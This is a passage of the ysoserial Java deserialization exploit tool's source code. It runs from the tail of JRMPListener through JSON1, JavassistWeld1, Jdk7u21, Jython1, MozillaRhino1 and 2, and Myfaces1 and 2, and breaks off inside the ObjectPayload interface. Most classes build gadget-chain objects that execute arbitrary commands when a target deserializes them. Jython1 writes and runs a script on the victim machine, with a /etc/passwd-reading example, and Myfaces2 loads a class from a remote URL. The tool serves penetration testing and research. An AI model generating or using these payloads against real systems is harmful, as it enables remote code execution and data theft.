* Gadget chain:
* UnicastRemoteObject.readObject(ObjectInputStream) line: 235
* UnicastRemoteObject.reexport() line: 266
* UnicastRemoteObject.exportObject(Remote, int) line: 320
* UnicastRemoteObject.exportObject(Remote, UnicastServerRef) line: 383
* UnicastServerRef.exportObject(Remote, Object, boolean) line: 208
* LiveRef.exportObject(Target) line: 147
* TCPEndpoint.exportObject(Target) line: 411
* TCPTransport.exportObject(Target) line: 249
* TCPTransport.listen() line: 319
*
* Requires:
* - JavaSE
*
* Argument:
* - Port number to open listener to
*/
@SuppressWarnings ( {
"restriction"
} )
@PayloadTest( skip = "This test would make you potentially vulnerable")
@Authors({ Authors.MBECHLER })
public class JRMPListener extends PayloadRunner implements ObjectPayload<UnicastRemoteObject> {
public UnicastRemoteObject getObject ( final String command ) throws Exception {
int jrmpPort = Integer.parseInt(command);
UnicastRemoteObject uro = Reflections.createWithConstructor(ActivationGroupImpl.class, RemoteObject.class, new Class[] {
RemoteRef.class
}, new Object[] {
new UnicastServerRef(jrmpPort)
});
Reflections.getField(UnicastRemoteObject.class, "port").set(uro, jrmpPort);
return uro;
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(JRMPListener.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/JSON1.java
================================================
package ysoserial.payloads;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;
import javax.management.openmbean.CompositeData;
import javax.management.openmbean.CompositeType;
import javax.management.openmbean.OpenDataException;
import javax.management.openmbean.OpenType;
import javax.management.openmbean.TabularDataSupport;
import javax.management.openmbean.TabularType;
import javax.xml.transform.Templates;
import org.springframework.aop.framework.AdvisedSupport;
import net.sf.json.JSONObject;
/**
*
* A bit more convoluted example
*
* com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.getOutputProperties()
* java.lang.reflect.Method.invoke(Object, Object...)
* org.springframework.aop.support.AopUtils.invokeJoinpointUsingReflection(Object, Method, Object[])
* org.springframework.aop.framework.JdkDynamicAopProxy.invoke(Object, Method, Object[])
* $Proxy0.getOutputProperties()
* java.lang.reflect.Method.invoke(Object, Object...)
* org.apache.commons.beanutils.PropertyUtilsBean.invokeMethod(Method, Object, Object[])
* org.apache.commons.beanutils.PropertyUtilsBean.getSimpleProperty(Object, String)
* org.apache.commons.beanutils.PropertyUtilsBean.getNestedProperty(Object, String)
* org.apache.commons.beanutils.PropertyUtilsBean.getProperty(Object, String)
* org.apache.commons.beanutils.PropertyUtils.getProperty(Object, String)
* net.sf.json.JSONObject.defaultBeanProcessing(Object, JsonConfig)
* net.sf.json.JSONObject._fromBean(Object, JsonConfig)
* net.sf.json.JSONObject.fromObject(Object, JsonConfig)
* net.sf.json.JSONObject(AbstractJSON)._processValue(Object, JsonConfig)
* net.sf.json.JSONObject._processValue(Object, JsonConfig)
* net.sf.json.JSONObject.processValue(Object, JsonConfig)
* net.sf.json.JSONObject.containsValue(Object, JsonConfig)
* net.sf.json.JSONObject.containsValue(Object)
* javax.management.openmbean.TabularDataSupport.containsValue(CompositeData)
* javax.management.openmbean.TabularDataSupport.equals(Object)
* java.util.HashMap<K,V>.putVal(int, K, V, boolean, boolean)
* java.util.HashMap<K,V>.readObject(ObjectInputStream)
*
* @author mbechler
*
*/
@SuppressWarnings ( {
"rawtypes", "unchecked", "restriction"
} )
@Dependencies({ "net.sf.json-lib:json-lib:jar:jdk15:2.4", "org.springframework:spring-aop:4.1.4.RELEASE",
// deep deps
"aopalliance:aopalliance:1.0", "commons-logging:commons-logging:1.2", "commons-lang:commons-lang:2.6",
"net.sf.ezmorph:ezmorph:1.0.6", "commons-beanutils:commons-beanutils:1.9.2",
"org.springframework:spring-core:4.1.4.RELEASE", "commons-collections:commons-collections:3.1" })
@Authors({ Authors.MBECHLER })
public class JSON1 implements ObjectPayload<Object> {
public Map getObject ( String command ) throws Exception {
return makeCallerChain(Gadgets.createTemplatesImpl(command), Templates.class);
}
/**
* Will call all getter methods on payload that are defined in the given interfaces
*/
public static Map makeCallerChain ( Object payload, Class... ifaces ) throws OpenDataException, NoSuchMethodException, InstantiationException,
IllegalAccessException, InvocationTargetException, Exception, ClassNotFoundException {
CompositeType rt = new CompositeType("a", "b", new String[] {
"a"
}, new String[] {
"a"
}, new OpenType[] {
javax.management.openmbean.SimpleType.INTEGER
});
TabularType tt = new TabularType("a", "b", rt, new String[] {
"a"
});
TabularDataSupport t1 = new TabularDataSupport(tt);
TabularDataSupport t2 = new TabularDataSupport(tt);
// we need to make payload implement composite data
// it's very likely that there are other proxy impls that could be used
AdvisedSupport as = new AdvisedSupport();
as.setTarget(payload);
InvocationHandler delegateInvocationHandler = (InvocationHandler) Reflections.newInstance("org.springframework.aop.framework.JdkDynamicAopProxy", as);
InvocationHandler cdsInvocationHandler = Gadgets.createMemoizedInvocationHandler(Gadgets.createMap("getCompositeType", rt));
InvocationHandler invocationHandler = (InvocationHandler) Reflections.newInstance("com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl");
((Map) Reflections.getFieldValue(invocationHandler, "classToInvocationHandler")).put(CompositeData.class, cdsInvocationHandler);
Reflections.setFieldValue(invocationHandler, "defaultHandler", delegateInvocationHandler);
final CompositeData cdsProxy = Gadgets.createProxy(invocationHandler, CompositeData.class, ifaces);
JSONObject jo = new JSONObject();
Map m = new HashMap();
m.put("t", cdsProxy);
Reflections.setFieldValue(jo, "properties", m);
Reflections.setFieldValue(jo, "properties", m);
Reflections.setFieldValue(t1, "dataMap", jo);
Reflections.setFieldValue(t2, "dataMap", jo);
return Gadgets.makeMap(t1, t2);
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(JSON1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/JavassistWeld1.java
================================================
package ysoserial.payloads;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.jboss.weld.interceptor.builder.InterceptionModelBuilder;
import org.jboss.weld.interceptor.builder.MethodReference;
import org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory;
import org.jboss.weld.interceptor.proxy.InterceptorMethodHandler;
import org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference;
import org.jboss.weld.interceptor.reader.DefaultMethodMetadata;
import org.jboss.weld.interceptor.reader.ReflectiveClassMetadata;
import org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata;
import org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator;
import org.jboss.weld.interceptor.spi.metadata.InterceptorReference;
import org.jboss.weld.interceptor.spi.metadata.MethodMetadata;
import org.jboss.weld.interceptor.spi.model.InterceptionModel;
import org.jboss.weld.interceptor.spi.model.InterceptionType;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.lang.reflect.Constructor;
import java.util.*;
/*
by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest(precondition = "isApplicableJavaVersion")
@Dependencies({"javassist:javassist:3.12.1.GA", "org.jboss.weld:weld-core:1.1.33.Final",
"javax.enterprise:cdi-api:1.0-SP1", "javax.interceptor:javax.interceptor-api:3.1",
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final", "org.slf4j:slf4j-api:1.7.21" })
@Authors({ Authors.MATTHIASKAISER })
public class JavassistWeld1 implements ObjectPayload<Object> {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public Object getObject(final String command) throws Exception {
final Object gadget = Gadgets.createTemplatesImpl(command);
InterceptionModelBuilder builder = InterceptionModelBuilder.newBuilderFor(HashMap.class);
ReflectiveClassMetadata metadata = (ReflectiveClassMetadata) ReflectiveClassMetadata.of(HashMap.class);
InterceptorReference interceptorReference = ClassMetadataInterceptorReference.of(metadata);
Set<InterceptionType> s = new HashSet<InterceptionType>();
s.add(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE);
Constructor defaultMethodMetadataConstructor = DefaultMethodMetadata.class.getDeclaredConstructor(Set.class, MethodReference.class);
Reflections.setAccessible(defaultMethodMetadataConstructor);
MethodMetadata methodMetadata = (MethodMetadata) defaultMethodMetadataConstructor.newInstance(s,
MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true));
List list = new ArrayList();
list.add(methodMetadata);
Map<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>> hashMap = new HashMap<org.jboss.weld.interceptor.spi.model.InterceptionType, List<MethodMetadata>>();
hashMap.put(org.jboss.weld.interceptor.spi.model.InterceptionType.POST_ACTIVATE, list);
SimpleInterceptorMetadata simpleInterceptorMetadata = new SimpleInterceptorMetadata(interceptorReference, true, hashMap);
builder.interceptAll().with(simpleInterceptorMetadata);
InterceptionModel model = builder.build();
HashMap map = new HashMap();
map.put("ysoserial", "ysoserial");
DefaultInvocationContextFactory factory = new DefaultInvocationContextFactory();
InterceptorInstantiator interceptorInstantiator = new InterceptorInstantiator() {
public Object createFor(InterceptorReference paramInterceptorReference) {
return gadget;
}
};
return new InterceptorMethodHandler(map, metadata, model, interceptorInstantiator, factory);
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(JavassistWeld1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Jdk7u21.java
================================================
package ysoserial.payloads;
import java.lang.reflect.InvocationHandler;
import java.util.HashMap;
import java.util.LinkedHashSet;
import javax.xml.transform.Templates;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/*
Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has
the same JRE version requirements.
See: https://gist.github.com/frohoff/24af7913611f8406eaf3
Call tree:
LinkedHashSet.readObject()
LinkedHashSet.add()
...
TemplatesImpl.hashCode() (X)
LinkedHashSet.add()
...
Proxy(Templates).hashCode() (X)
AnnotationInvocationHandler.invoke() (X)
AnnotationInvocationHandler.hashCodeImpl() (X)
String.hashCode() (0)
AnnotationInvocationHandler.memberValueHashCode() (X)
TemplatesImpl.hashCode() (X)
Proxy(Templates).equals()
AnnotationInvocationHandler.invoke()
AnnotationInvocationHandler.equalsImpl()
Method.invoke()
...
TemplatesImpl.getOutputProperties()
TemplatesImpl.newTransformer()
TemplatesImpl.getTransletInstance()
TemplatesImpl.defineTransletClasses()
ClassLoader.defineClass()
Class.newInstance()
...
MaliciousClass.<clinit>()
...
Runtime.exec()
*/
@SuppressWarnings({ "rawtypes", "unchecked" })
@PayloadTest ( precondition = "isApplicableJavaVersion")
@Dependencies()
@Authors({ Authors.FROHOFF })
public class Jdk7u21 implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
final Object templates = Gadgets.createTemplatesImpl(command);
String zeroHashCodeStr = "f5a5a608";
HashMap map = new HashMap();
map.put(zeroHashCodeStr, "foo");
InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
Reflections.setFieldValue(tempHandler, "type", Templates.class);
Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
LinkedHashSet set = new LinkedHashSet(); // maintain order
set.add(templates);
set.add(proxy);
Reflections.setFieldValue(templates, "_auxClasses", null);
Reflections.setFieldValue(templates, "_class", null);
map.put(zeroHashCodeStr, templates); // swap in real object
return set;
}
public static boolean isApplicableJavaVersion() {
JavaVersion v = JavaVersion.getLocalVersion();
return v != null && (v.major < 7 || (v.major == 7 && v.update <= 21));
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Jdk7u21.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Jython1.java
================================================
package ysoserial.payloads;
import org.apache.commons.io.FileUtils;
import org.python.core.*;
import java.math.BigInteger;
import java.io.File;
import java.lang.reflect.Proxy;
import java.util.Arrays;
import java.util.Comparator;
import java.util.PriorityQueue;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.util.Reflections;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*
* This version of Jython1 writes a python script on the victim machine and
* executes it. The format of the parameters is:
*
* <local path>;<remote path>
*
* Where local path is the python script's location on the attack box and
* remote path is the location where the script will be written/executed from.
* For example:
*
* "/home/albino_lobster/read_etc_passwd.py;/tmp/jython1.py"
*
* In the above example, if "read_etc_passwd.py" simply contained the string:
*
* raise Exception(open('/etc/passwd', 'r').read())
*
* Then, when deserialized, the script will read in /etc/passwd and raise an
* exception with its contents (which could be useful if the target returns
* exception information).
*/
@PayloadTest(skip="non RCE")
@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
@Dependencies({ "org.python:jython-standalone:2.5.2" })
@Authors({ Authors.PWNTESTER, Authors.CSCHNEIDER4711 })
public class Jython1 extends PayloadRunner implements ObjectPayload<PriorityQueue> {
public PriorityQueue getObject(String command) throws Exception {
String[] paths = command.split(";");
if (paths.length != 2) {
throw new IllegalArgumentException("Unsupported command " + command + " " + Arrays.toString(paths));
}
// Set payload parameters
String python_code = FileUtils.readFileToString(new File(paths[0]), "UTF-8");
// Python bytecode to write a file on disk and execute it
String code =
"740000" + //0 LOAD_GLOBAL 0 (open)
"640100" + //3 LOAD_CONST 1 (remote path)
"640200" + //6 LOAD_CONST 2 ('w+')
"830200" + //9 CALL_FUNCTION 2
"7D0000" + //12 STORE_FAST 0 (file)
"7C0000" + //15 LOAD_FAST 0 (file)
"690100" + //18 LOAD_ATTR 1 (write)
"640300" + //21 LOAD_CONST 3 (python code)
"830100" + //24 CALL_FUNCTION 1
"01" + //27 POP_TOP
"7C0000" + //28 LOAD_FAST 0 (file)
"690200" + //31 LOAD_ATTR 2 (close)
"830000" + //34 CALL_FUNCTION 0
"01" + //37 POP_TOP
"740300" + //38 LOAD_GLOBAL 3 (execfile)
"640100" + //41 LOAD_CONST 1 (remote path)
"830100" + //44 CALL_FUNCTION 1
"01" + //47 POP_TOP
"640000" + //48 LOAD_CONST 0 (None)
"53"; //51 RETURN_VALUE
// Helping consts and names
PyObject[] consts = new PyObject[]{new PyString(""), new PyString(paths[1]), new PyString("w+"), new PyString(python_code)};
String[] names = new String[]{"open", "write", "close", "execfile"};
// Generating PyBytecode wrapper for our python bytecode
PyBytecode codeobj = new PyBytecode(2, 2, 10, 64, "", consts, names, new String[]{ "", "" }, "noname", "<module>", 0, "");
Reflections.setFieldValue(codeobj, "co_code", new BigInteger(code, 16).toByteArray());
// Create a PyFunction Invocation handler that will call our python bytecode when intercepting any method
PyFunction handler = new PyFunction(new PyStringMap(), null, codeobj);
// Prepare Trigger Gadget
Comparator comparator = (Comparator) Proxy.newProxyInstance(Comparator.class.getClassLoader(), new Class<?>[]{Comparator.class}, handler);
PriorityQueue<Object> priorityQueue = new PriorityQueue<Object>(2, comparator);
Object[] queue = new Object[] {1,1};
Reflections.setFieldValue(priorityQueue, "queue", queue);
Reflections.setFieldValue(priorityQueue, "size", 2);
return priorityQueue;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(Jython1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/MozillaRhino1.java
================================================
package ysoserial.payloads;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import org.mozilla.javascript.*;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import javax.management.BadAttributeValueExpException;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/*
by @matthias_kaiser
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@PayloadTest( precondition = "isApplicableJavaVersion")
@Dependencies({"rhino:js:1.7R2"})
@Authors({ Authors.MATTHIASKAISER })
public class MozillaRhino1 implements ObjectPayload<Object> {
public Object getObject(final String command) throws Exception {
Class nativeErrorClass = Class.forName("org.mozilla.javascript.NativeError");
Constructor nativeErrorConstructor = nativeErrorClass.getDeclaredConstructor();
Reflections.setAccessible(nativeErrorConstructor);
IdScriptableObject idScriptableObject = (IdScriptableObject) nativeErrorConstructor.newInstance();
Context context = Context.enter();
NativeObject scriptableObject = (NativeObject) context.initStandardObjects();
Method enterMethod = Context.class.getDeclaredMethod("enter");
NativeJavaMethod method = new NativeJavaMethod(enterMethod, "name");
idScriptableObject.setGetterOrSetter("name", 0, method, false);
Method newTransformer = TemplatesImpl.class.getDeclaredMethod("newTransformer");
NativeJavaMethod nativeJavaMethod = new NativeJavaMethod(newTransformer, "message");
idScriptableObject.setGetterOrSetter("message", 0, nativeJavaMethod, false);
Method getSlot = ScriptableObject.class.getDeclaredMethod("getSlot", String.class, int.class, int.class);
Reflections.setAccessible(getSlot);
Object slot = getSlot.invoke(idScriptableObject, "name", 0, 1);
Field getter = slot.getClass().getDeclaredField("getter");
Reflections.setAccessible(getter);
Class memberboxClass = Class.forName("org.mozilla.javascript.MemberBox");
Constructor memberboxClassConstructor = memberboxClass.getDeclaredConstructor(Method.class);
Reflections.setAccessible(memberboxClassConstructor);
Object memberboxes = memberboxClassConstructor.newInstance(enterMethod);
getter.set(slot, memberboxes);
NativeJavaObject nativeObject = new NativeJavaObject(scriptableObject, Gadgets.createTemplatesImpl(command), TemplatesImpl.class);
idScriptableObject.setPrototype(nativeObject);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field valField = badAttributeValueExpException.getClass().getDeclaredField("val");
Reflections.setAccessible(valField);
valField.set(badAttributeValueExpException, idScriptableObject);
return badAttributeValueExpException;
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(MozillaRhino1.class, args);
}
public static boolean isApplicableJavaVersion() {
return JavaVersion.isBadAttrValExcReadObj();
}
}
================================================
FILE: src/main/java/ysoserial/payloads/MozillaRhino2.java
================================================
package ysoserial.payloads;
import org.mozilla.javascript.*;
import org.mozilla.javascript.tools.shell.Environment;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Method;
import java.util.Hashtable;
import java.util.Map;
/*
Works on rhino 1.6R6 and above & doesn't depend on BadAttributeValueExpException's readObject
Chain:
NativeJavaObject.readObject()
JavaAdapter.readAdapterObject()
ObjectInputStream.readObject()
...
NativeJavaObject.readObject()
JavaAdapter.readAdapterObject()
JavaAdapter.getAdapterClass()
JavaAdapter.getObjectFunctionNames()
ScriptableObject.getProperty()
ScriptableObject.get()
ScriptableObject.getImpl()
Method.invoke()
Context.enter()
JavaAdapter.getAdapterClass()
JavaAdapter.getObjectFunctionNames()
ScriptableObject.getProperty()
NativeJavaArray.get()
NativeJavaObject.get()
JavaMembers.get()
Method.invoke()
TemplatesImpl.getOutputProperties()
...
by @_tint0
*/
@SuppressWarnings({"rawtypes", "unchecked"})
@Dependencies({"rhino:js:1.7R2"})
@Authors({ Authors.TINT0 })
public class MozillaRhino2 implements ObjectPayload<Object> {
public Object getObject( String command) throws Exception {
ScriptableObject dummyScope = new Environment();
Map<Object, Object> associatedValues = new Hashtable<Object, Object>();
associatedValues.put("ClassCache", Reflections.createWithoutConstructor(ClassCache.class));
Reflections.setFieldValue(dummyScope, "associatedValues", associatedValues);
Object initContextMemberBox = Reflections.createWithConstructor(
Class.forName("org.mozilla.javascript.MemberBox"),
(Class<Object>)Class.forName("org.mozilla.javascript.MemberBox"),
new Class[] {Method.class},
new Object[] {Context.class.getMethod("enter")});
ScriptableObject initContextScriptableObject = new Environment();
Method makeSlot = ScriptableObject.class.getDeclaredMethod("accessSlot", String.class, int.class, int.class);
Reflections.setAccessible(makeSlot);
Object slot = makeSlot.invoke(initContextScriptableObject, "foo", 0, 4);
Reflections.setFieldValue(slot, "getter", initContextMemberBox);
NativeJavaObject initContextNativeJavaObject = new NativeJavaObject();
Reflections.setFieldValue(initContextNativeJavaObject, "parent", dummyScope);
Reflections.setFieldValue(initContextNativeJavaObject, "isAdapter", true);
Reflections.setFieldValue(initContextNativeJavaObject, "adapter_writeAdapterObject",
this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
Reflections.setFieldValue(initContextNativeJavaObject, "javaObject", initContextScriptableObject);
ScriptableObject scriptableObject = new Environment();
scriptableObject.setParentScope(initContextNativeJavaObject);
makeSlot.invoke(scriptableObject, "outputProperties", 0, 2);
NativeJavaArray nativeJavaArray = Reflections.createWithoutConstructor(NativeJavaArray.class);
Reflections.setFieldValue(nativeJavaArray, "parent", dummyScope);
Reflections.setFieldValue(nativeJavaArray, "javaObject", Gadgets.createTemplatesImpl(command));
nativeJavaArray.setPrototype(scriptableObject);
Reflections.setFieldValue(nativeJavaArray, "prototype", scriptableObject);
NativeJavaObject nativeJavaObject = new NativeJavaObject();
Reflections.setFieldValue(nativeJavaObject, "parent", dummyScope);
Reflections.setFieldValue(nativeJavaObject, "isAdapter", true);
Reflections.setFieldValue(nativeJavaObject, "adapter_writeAdapterObject",
this.getClass().getMethod("customWriteAdapterObject", Object.class, ObjectOutputStream.class));
Reflections.setFieldValue(nativeJavaObject, "javaObject", nativeJavaArray);
return nativeJavaObject;
}
public static void customWriteAdapterObject(Object javaObject, ObjectOutputStream out) throws IOException {
out.writeObject("java.lang.Object");
out.writeObject(new String[0]);
out.writeObject(javaObject);
}
public static void main(final String[] args) throws Exception {
PayloadRunner.run(MozillaRhino2.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Myfaces1.java
================================================
package ysoserial.payloads;
import javax.el.ELContext;
import javax.el.ExpressionFactory;
import javax.el.ValueExpression;
import javax.servlet.ServletContext;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import org.apache.myfaces.context.servlet.FacesContextImpl;
import org.apache.myfaces.context.servlet.FacesContextImplBase;
import org.apache.myfaces.el.CompositeELResolver;
import org.apache.myfaces.el.unified.FacesELContext;
import org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.Gadgets;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - an EL expression to execute
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest(skip="Requires running MyFaces, no direct execution")
@Authors({ Authors.MBECHLER })
public class Myfaces1 implements ObjectPayload<Object>, DynamicDependencies {
public Object getObject ( String command ) throws Exception {
return makeExpressionPayload(command);
}
public static String[] getDependencies () {
if ( System.getProperty("el") == null || "apache".equals(System.getProperty("el")) ) {
return new String[] {
"org.apache.myfaces.core:myfaces-impl:2.2.9", "org.apache.myfaces.core:myfaces-api:2.2.9",
"org.mortbay.jasper:apache-el:8.0.27",
"javax.servlet:javax.servlet-api:3.1.0",
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19", "org.hamcrest:hamcrest-core:1.1", "org.objenesis:objenesis:2.1"
};
} else if ( "juel".equals(System.getProperty("el")) ) {
return new String[] {
"org.apache.myfaces.core:myfaces-impl:2.2.9", "org.apache.myfaces.core:myfaces-api:2.2.9",
"de.odysseus.juel:juel-impl:2.2.7", "de.odysseus.juel:juel-api:2.2.7",
"javax.servlet:javax.servlet-api:3.1.0",
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19", "org.hamcrest:hamcrest-core:1.1", "org.objenesis:objenesis:2.1"
};
}
throw new IllegalArgumentException("Invalid el type " + System.getProperty("el"));
}
public static Object makeExpressionPayload ( String expr ) throws IllegalArgumentException, IllegalAccessException, Exception {
FacesContextImpl fc = new FacesContextImpl((ServletContext) null, (ServletRequest) null, (ServletResponse) null);
ELContext elContext = new FacesELContext(new CompositeELResolver(), fc);
Reflections.getField(FacesContextImplBase.class, "_elContext").set(fc, elContext);
ExpressionFactory expressionFactory = ExpressionFactory.newInstance();
ValueExpression ve1 = expressionFactory.createValueExpression(elContext, expr, Object.class);
ValueExpressionMethodExpression e = new ValueExpressionMethodExpression(ve1);
ValueExpression ve2 = expressionFactory.createValueExpression(elContext, "${true}", Object.class);
ValueExpressionMethodExpression e2 = new ValueExpressionMethodExpression(ve2);
return Gadgets.makeMap(e2, e);
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Myfaces1.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/Myfaces2.java
================================================
package ysoserial.payloads;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.JavaVersion;
import ysoserial.payloads.util.PayloadRunner;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - base_url:classname
*
* Yields:
* - Instantiation of remotely loaded class
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest(harness="ysoserial.test.payloads.MyfacesTest", precondition = "isApplicableJavaVersion")
@Authors({ Authors.MBECHLER })
public class Myfaces2 implements ObjectPayload<Object>, DynamicDependencies {
public static boolean isApplicableJavaVersion() {
return JavaVersion.isAtLeast(7);
}
public static String[] getDependencies () {
return Myfaces1.getDependencies();
}
public Object getObject ( String command ) throws Exception {
int sep = command.lastIndexOf(':');
if ( sep < 0 ) {
throw new IllegalArgumentException("Command format is: <base_url>:<classname>");
}
String url = command.substring(0, sep);
String className = command.substring(sep + 1);
// based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
String expr = "${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}";
// if we add fewer than the actual classloaders we end up with a null entry
for ( int i = 0; i < 100; i++ ) {
expr += "${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('" + url + "').toURL())}";
}
expr += "${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')"
+ ".toArray(request.getClass().getClassLoader().getURLs())).loadClass('" + className + "').newInstance()}";
return Myfaces1.makeExpressionPayload(expr);
}
public static void main ( final String[] args ) throws Exception {
PayloadRunner.run(Myfaces2.class, args);
}
}
================================================
FILE: src/main/java/ysoserial/payloads/ObjectPayload.java
================================================
package ysoserial.payloads;
import java.lang.reflect.Modifier;
import java.util.Iterator;
import java.util.Set;
import org.reflections.Reflections;
import ysoserial.GeneratePayload;
@SuppressWarnings ( "rawtypes" )
public interface ObjectPayload <T> {
/*
* return armed payload object to be serialized that will execute specified
* command on deserialization
*/
public T getObject ( String command ) throws Exception;
public static class Utils {
// get payload classes by classpath scanning
public static Set<Class<? extends ObjectPayload>> getPayloadClasses () {
final Reflections reflections = new Reflections(ObjectPayload.class.getPackage().getName());
final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);
for ( Iterator<Class<? extends ObjectPayload>> iterator = payloadTypes.iterator(); iterator.hasNext(); ) {
Class<? extends ObjectPayload> pc = iterator.next();
if ( pc.isInterface() || Modifier.isAbstract(pc.getModifiers()) ) {
iterator.remove();
}
}
return payloadTypes;
}
@SuppressWarnings ( "unchecked" )
public static Class<? extends ObjectPayload> getPayloadClass ( final String className ) {
Class<? extends ObjectPayload> clazz = null;
try {
clazz = (Class<? extends ObjectPayload>) Class.forName(className);
}
catch ( Exception e1 ) {}
if ( clazz == null ) {
try {
return clazz = (Class<? extends ObjectPayload>) Class
.forName(GeneratePayload.class.getPackage().getName() + ".payloads." + className);
}
catch ( Exception e2 ) {}
}
if ( clazz != null && !ObjectPayload.class.isAssignableFrom(clazz) ) {
clazz = null;
}
return clazz;
}
public static Object makePayloadObject ( String payloadType, String payloadArg ) {
final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
if ( payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass) ) {
throw new IllegalArgumentException("Invalid payload type '" + payloadType + "'");
}
final Object payloadObject;
try {
final ObjectPayload payload = payloadClass.newInstance();
payloadObject = payload.getObject(payloadArg);
}
catch ( Exception e ) {
throw new IllegalArgumentException("Failed to construct payload", e);
}
return payloadObject;
}
@SuppressWarnings ( "unchecked" )
public static void releasePayload ( ObjectPayload payload, Object object ) throws Exception {
if ( payload instanceof ReleaseableObjectPayload ) {
( (ReleaseableObjectPayload) payload ).release(object);
}
}
public static void releasePayload ( String payloadType, Object payloadObject ) {
